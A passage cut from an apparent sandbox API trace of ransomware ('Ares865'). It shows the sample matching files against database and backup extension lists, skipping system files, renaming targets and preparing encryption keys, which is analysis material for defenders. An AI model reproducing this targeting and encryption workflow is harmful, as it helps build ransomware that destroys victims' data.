(lpString="abs") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.118] lstrlenW (lpString="abx") returned 3 [0058.118] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.118] lstrlenW (lpString="accdb") returned 5 [0058.118] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.118] lstrlenW (lpString="accdc") returned 5 [0058.118] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.118] lstrlenW (lpString="accde") returned 5 [0058.118] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.118] lstrlenW (lpString="accdr") returned 5 [0058.119] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.119] lstrlenW (lpString="accdt") returned 5 [0058.119] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.119] lstrlenW (lpString="accdw") returned 5 [0058.119] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.119] lstrlenW (lpString="accft") returned 5 [0058.119] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.119] lstrlenW (lpString="adb") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.119] lstrlenW (lpString="adb") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.119] lstrlenW (lpString="ade") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.119] lstrlenW (lpString="adf") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.119] lstrlenW (lpString="adn") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.119] lstrlenW (lpString="adp") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.119] lstrlenW (lpString="alf") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.119] lstrlenW (lpString="ask") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.119] lstrlenW (lpString="btr") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.119] lstrlenW (lpString="cat") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.119] lstrlenW (lpString="cdb") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.119] lstrlenW (lpString="ckp") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.119] lstrlenW (lpString="cma") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.119] lstrlenW (lpString="cpd") returned 3 [0058.119] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.119] lstrlenW (lpString="dacpac") returned 6 [0058.120] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.120] lstrlenW (lpString="dad") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.120] lstrlenW (lpString="dadiagrams") returned 10 [0058.120] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.120] lstrlenW (lpString="daschema") returned 8 [0058.120] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.120] lstrlenW (lpString="db-journal") returned 10 [0058.120] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.120] lstrlenW (lpString="db-shm") returned 6 [0058.120] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.120] lstrlenW (lpString="db-wal") returned 6 [0058.120] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.120] lstrlenW (lpString="dbc") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.120] lstrlenW (lpString="dbs") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.120] lstrlenW (lpString="dbt") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.120] lstrlenW (lpString="dbv") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.120] lstrlenW (lpString="dbx") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.120] lstrlenW (lpString="dcb") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.120] lstrlenW (lpString="dct") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.120] lstrlenW (lpString="dcx") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.120] lstrlenW (lpString="ddl") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.120] lstrlenW (lpString="dlis") returned 4 [0058.120] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.120] lstrlenW (lpString="dp1") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.120] lstrlenW (lpString="dqy") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.120] lstrlenW (lpString="dsk") returned 3 [0058.120] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.121] lstrlenW (lpString="dsn") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.121] lstrlenW (lpString="dtsx") returned 4 [0058.121] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.121] lstrlenW (lpString="dxl") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.121] lstrlenW (lpString="eco") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.121] lstrlenW (lpString="ecx") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.121] lstrlenW (lpString="edb") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.121] lstrlenW (lpString="epim") returned 4 [0058.121] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.121] lstrlenW (lpString="fcd") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.121] lstrlenW (lpString="fdb") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.121] lstrlenW (lpString="fic") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.121] lstrlenW (lpString="flexolibrary") returned 12 [0058.121] lstrlenW (lpString="fm5") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.121] lstrlenW (lpString="fmp") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.121] lstrlenW (lpString="fmp12") returned 5 [0058.121] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.121] lstrlenW (lpString="fmpsl") returned 5 [0058.121] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.121] lstrlenW (lpString="fol") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.121] lstrlenW (lpString="fp3") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.121] lstrlenW (lpString="fp4") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.121] lstrlenW (lpString="fp5") returned 3 [0058.121] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.121] lstrlenW (lpString="fp7") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.122] lstrlenW (lpString="fpt") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.122] lstrlenW (lpString="frm") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.122] lstrlenW (lpString="gdb") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.122] lstrlenW (lpString="gdb") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.122] lstrlenW (lpString="grdb") returned 4 [0058.122] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.122] lstrlenW (lpString="gwi") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.122] lstrlenW (lpString="hdb") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.122] lstrlenW (lpString="his") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.122] lstrlenW (lpString="ib") returned 2 [0058.122] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.122] lstrlenW (lpString="idb") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.122] lstrlenW (lpString="ihx") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.122] lstrlenW (lpString="itdb") returned 4 [0058.122] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.122] lstrlenW (lpString="itw") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.122] lstrlenW (lpString="jet") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.122] lstrlenW (lpString="jtx") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.122] lstrlenW (lpString="kdb") returned 3 [0058.122] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.122] lstrlenW (lpString="kexi") returned 4 [0058.122] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.122] lstrlenW (lpString="kexic") returned 5 [0058.122] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.123] lstrlenW (lpString="kexis") returned 5 [0058.123] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.123] lstrlenW (lpString="lgc") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.123] lstrlenW (lpString="lwx") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.123] lstrlenW (lpString="maf") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.123] lstrlenW (lpString="maq") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.123] lstrlenW (lpString="mar") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.123] lstrlenW (lpString="marshal") returned 7 [0058.123] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.123] lstrlenW (lpString="mas") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.123] lstrlenW (lpString="mav") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.123] lstrlenW (lpString="maw") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.123] lstrlenW (lpString="mdbhtml") returned 7 [0058.123] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.123] lstrlenW (lpString="mdn") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.123] lstrlenW (lpString="mdt") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.123] lstrlenW (lpString="mfd") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.123] lstrlenW (lpString="mpd") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.123] lstrlenW (lpString="mrg") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.123] lstrlenW (lpString="mud") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.123] lstrlenW (lpString="mwb") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.123] lstrlenW (lpString="myd") returned 3 [0058.123] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.124] lstrlenW (lpString="ndf") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.124] lstrlenW (lpString="nnt") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.124] lstrlenW (lpString="nrmlib") returned 6 [0058.124] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.124] lstrlenW (lpString="ns2") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.124] lstrlenW (lpString="ns3") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.124] lstrlenW (lpString="ns4") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.124] lstrlenW (lpString="nsf") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.124] lstrlenW (lpString="nv") returned 2 [0058.124] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.124] lstrlenW (lpString="nv2") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.124] lstrlenW (lpString="nwdb") returned 4 [0058.124] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.124] lstrlenW (lpString="nyf") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.124] lstrlenW (lpString="odb") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.124] lstrlenW (lpString="odb") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.124] lstrlenW (lpString="oqy") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.124] lstrlenW (lpString="ora") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.124] lstrlenW (lpString="orx") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.124] lstrlenW (lpString="owc") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.124] lstrlenW (lpString="p96") returned 3 [0058.124] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.124] lstrlenW (lpString="p97") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.125] lstrlenW (lpString="pan") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.125] lstrlenW (lpString="pdb") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.125] lstrlenW (lpString="pdm") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.125] lstrlenW (lpString="pnz") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.125] lstrlenW (lpString="qry") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.125] lstrlenW (lpString="qvd") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.125] lstrlenW (lpString="rbf") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.125] lstrlenW (lpString="rctd") returned 4 [0058.125] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.125] lstrlenW (lpString="rod") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.125] lstrlenW (lpString="rodx") returned 4 [0058.125] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.125] lstrlenW (lpString="rpd") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.125] lstrlenW (lpString="rsd") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.125] lstrlenW (lpString="sas7bdat") returned 8 [0058.125] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.125] lstrlenW (lpString="sbf") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.125] lstrlenW (lpString="scx") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.125] lstrlenW (lpString="sdb") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.125] lstrlenW (lpString="sdc") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.125] lstrlenW (lpString="sdf") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.125] lstrlenW (lpString="sis") returned 3 [0058.125] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.126] lstrlenW (lpString="spq") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.126] lstrlenW (lpString="te") returned 2 [0058.126] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.126] lstrlenW (lpString="teacher") returned 7 [0058.126] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.126] lstrlenW (lpString="tmd") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.126] lstrlenW (lpString="tps") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.126] lstrlenW (lpString="trc") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.126] lstrlenW (lpString="trc") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.126] lstrlenW (lpString="trm") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.126] lstrlenW (lpString="udb") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.126] lstrlenW (lpString="udl") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.126] lstrlenW (lpString="usr") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.126] lstrlenW (lpString="v12") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.126] lstrlenW (lpString="vis") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.126] lstrlenW (lpString="vpd") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.126] lstrlenW (lpString="vvv") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.126] lstrlenW (lpString="wdb") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.126] lstrlenW (lpString="wmdb") returned 4 [0058.126] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.126] lstrlenW (lpString="wrk") returned 3 [0058.126] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.126] lstrlenW (lpString="xdb") returned 3 [0058.127] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.127] lstrlenW (lpString="xld") returned 3 [0058.127] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.127] lstrlenW (lpString="xmlff") returned 5 [0058.127] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865") returned 73 [0058.127] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.128] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.129] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=318) returned 1 [0058.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0058.129] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f02f8) returned 1 [0058.130] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.130] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.130] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x440, lpName=0x0) returned 0x154 [0058.132] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x440) returned 0x190000 [0058.133] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f02f8) returned 1 [0058.134] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.134] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0058.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.134] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.134] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.134] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.134] CloseHandle (hObject=0x154) returned 1 [0058.134] CloseHandle (hObject=0x15c) returned 1 [0058.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0058.136] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.136] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dd3ec69, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e0387ee, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="aoldtz.exe") returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2=".") returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="..") returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="windows") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="bootmgr") returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="temp") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="pagefile.sys") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="boot") returned 1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="ids.txt") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="ntuser.dat") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="perflogs") returned -1 [0058.136] lstrcmpiW (lpString1="Help.lnk", lpString2="MSBuild") returned -1 [0058.136] lstrlenW (lpString="Help.lnk") returned 8 [0058.136] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Maintenance\\Desktop.ini") returned 65 [0058.136] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Help.lnk" | out: lpString1="Help.lnk") returned="Help.lnk" [0058.136] lstrlenW (lpString="Help.lnk") returned 8 [0058.137] lstrlenW (lpString="Ares865") returned 7 [0058.137] lstrcmpiW (lpString1="elp.lnk", lpString2="Ares865") returned 1 [0058.137] lstrlenW (lpString=".dll") returned 4 [0058.137] lstrcmpiW (lpString1="Help.lnk", lpString2=".dll") returned 1 [0058.137] lstrlenW (lpString=".lnk") returned 4 [0058.137] lstrcmpiW (lpString1="Help.lnk", lpString2=".lnk") returned 1 [0058.137] lstrlenW (lpString=".ini") returned 4 [0058.137] lstrcmpiW (lpString1="Help.lnk", lpString2=".ini") returned 1 [0058.137] lstrlenW (lpString=".sys") returned 4 [0058.137] lstrcmpiW (lpString1="Help.lnk", lpString2=".sys") returned 1 [0058.137] lstrlenW (lpString="Help.lnk") returned 8 [0058.137] lstrlenW (lpString="bak") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.137] lstrlenW (lpString="ba_") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.137] lstrlenW (lpString="dbb") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.137] lstrlenW (lpString="vmdk") returned 4 [0058.137] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.137] lstrlenW (lpString="rar") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.137] lstrlenW (lpString="zip") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.137] lstrlenW (lpString="tgz") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.137] lstrlenW (lpString="vbox") returned 4 [0058.137] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.137] lstrlenW (lpString="vdi") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.137] lstrlenW (lpString="vhd") returned 3 [0058.137] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.137] lstrlenW (lpString="vhdx") returned 4 [0058.137] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.137] lstrlenW (lpString="avhd") returned 4 [0058.137] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.137] lstrlenW (lpString="db") returned 2 [0058.137] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.137] lstrlenW (lpString="db2") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.138] lstrlenW (lpString="db3") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.138] lstrlenW (lpString="dbf") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.138] lstrlenW (lpString="mdf") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.138] lstrlenW (lpString="mdb") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.138] lstrlenW (lpString="sql") returned 3 [0058.138] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.138] lstrlenW (lpString="sqlite") returned 6 [0058.138] lstrcmpiW (lpString1="lp.lnk", lpString2="sqlite") returned -1 [0058.138] lstrlenW (lpString="sqlite3") 